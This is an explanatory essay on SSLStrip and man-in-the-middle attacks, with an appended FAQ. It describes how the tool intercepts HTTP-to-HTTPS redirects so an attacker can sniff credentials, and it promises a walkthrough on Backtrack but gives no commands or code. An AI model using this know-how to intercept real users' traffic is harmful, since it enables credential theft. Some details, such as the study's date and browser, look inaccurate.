Man in the Middle Attack: Focus on SSLStrip

Man in the Middle Attack: Focus on SSLStrip

In today’s outlook, SSL enabled websites supposedly offer security and peace of mind; that peace of mind to use your computer to shop or to view your bank account status. While SSL is safe when used properly, there lies a tool that attackers can use against society. That tool is called SSLStrip. SSLStrip can be used in a Man in the Middle attack, which in turn, an attacker could use to falsely gain personal information.

Introduction

SSLStrip was created by an independent hacker known as Moxie Marlinspike. This tool was revealed in the 2009 Black Hat Convention in Washington D.C.. As the tool was presented, it became clear that nothing like this tool had ever been considered. As noted on the personal website of Marlinspike, “It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.” (Marlinspike). This tool undoubtedly has potential for use by attackers ranging from small children acting as hackers or “script kiddies” to the most advanced hacker that makes his or her living from stealing personal information from unknowing users. The actual implementation of the tool also allows for other advanced modes and options. For example, the attacker has an option of including a favicon or a “lock icon” on the webpage either at the bottom of the page or in the address bar to more deceive the users. The entire purpose of the SSLStrip is to deceive the user. The deceit occurs without the inexperienced users knowing anything has occurred.

A review of SSLStrip explains: “The root of the problem of the man-in-the-middle attack is the way that browsers and web sites currently deal with SSL encryption on web pages.” (Enrielt). With the use of the man in the middle attack using SSLStrip, the tool does away with the harsh warning signs that browsers give as indicators of a false certificate or an expired certificate. Normal users will not notice the warning signs, nor will they notice the lock icon missing or the (s) from the https:// in the address bar. Many users do not ever type in the address bar https or http; they normally encounter secure websites through redirects from http. The way that SSLStrip works is by redirecting that traffic to itself and acting as a proxy. For example, a user may open their web browser and enter in the search engine, Gmail. The user will then open the link to Gmail, and as Gmail normally redirects the user to a SSL enabled webpage login, this is where SSLStrip would receive that redirect and basically strip away the SSL enabled features and send the user to a none-SSL enabled version of the website login screen. The attacker then would be able to listen with a packet sniffer and see any and all traffic that is transmitted over their http connection. A study in 2006 by Carnegie Mellon University concluded that using FireFox3, 31% ignored the warnings for an unknown Certificate Authority Warning (Sunshine). With that said, many users, like myself have almost grown accustom to warning signs just like banner ads on a webpage.

The attack

The man in the middle attack is classically how an attacker would ascertain access to information that he or she would not normally be able to see by electronically placing themselves in-between a user and a server. An article states: “SSLStrip does not demonstrate a weakness in SSL encryption, but rather takes advantage of users who fail to look for trusted SSL encryption when sending sensitive information over the Internet.” (DigiCert EV SSL Certificates Protect Users From SSLstrip and Man-in-the-Middle Attacks). Many websites implement a redirect that enables users to visit their website through http but when credentials or personal information is required, the website automatically redirects the user to an SSL enabled website. This common practice is the downfall of any network because that basic redirect can be intercepted and manipulated so that users never get to their intended destination securely.

In the following section I will be explaining exactly how to implement this attack to better explain each process in detail. For my attack I will be using a Linux distribution named Backtrack, which is open source and can be found at http://www.backtrack-linux.org/. For the purposes of this example, I will not be discussing iptables/networking or the specific command options that are issued for each software tool.

Frequently asked questions

What is the main focus of the text "Man in the Middle Attack: Focus on SSLStrip"?

The text primarily focuses on the SSLStrip tool and its use in man-in-the-middle attacks to intercept and potentially steal personal information from unsuspecting users, despite the presence of SSL encryption on websites.

What is SSLStrip?

SSLStrip is a tool created by Moxie Marlinspike that transparently hijacks HTTP traffic, watches for HTTPS links and redirects, and then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. This deceives users into using non-SSL enabled versions of websites without them knowing.

How does SSLStrip work in a man-in-the-middle attack?

SSLStrip intercepts the redirect from an HTTP website to its HTTPS counterpart. Instead of allowing the user to be redirected to the secure HTTPS site, SSLStrip strips away the SSL enabled features and sends the user to a non-SSL enabled version of the website. The attacker can then eavesdrop on the unencrypted traffic.

Why is SSLStrip effective?

SSLStrip is effective because many users don't pay close attention to security indicators such as the lock icon or the "s" in "https://" in the address bar. They also may ignore certificate warnings or have become desensitized to them. Additionally, many websites rely on redirects from HTTP to HTTPS, which SSLStrip can intercept.

What is a man-in-the-middle attack?

A man-in-the-middle attack involves an attacker placing themselves electronically between a user and a server, allowing them to intercept and potentially manipulate the data being transmitted.

Does SSLStrip exploit a weakness in SSL encryption?

No, SSLStrip does not exploit a weakness in SSL encryption itself. It takes advantage of users who fail to verify that they are using trusted SSL encryption when sending sensitive information online.

How do websites contribute to the vulnerability exploited by SSLStrip?

Many websites implement redirects that enable users to visit their website through HTTP initially, and then redirect to HTTPS when sensitive information is required. This practice creates a point of interception that SSLStrip can exploit.

What Linux distribution is recommended for demonstrating an SSLStrip attack in the text?

The text recommends using the Backtrack Linux distribution, an open-source penetration testing platform.

What is the normal transaction flow when visiting a secure website, and how does SSLStrip interfere?

Normally, an HTTP request is sent to the server, which responds with a redirect to HTTPS. The PC then establishes a secure connection and receives the certificate. SSLStrip interferes by intercepting the redirect and stripping away the SSL encryption before the user connects to the legitimate HTTPS site.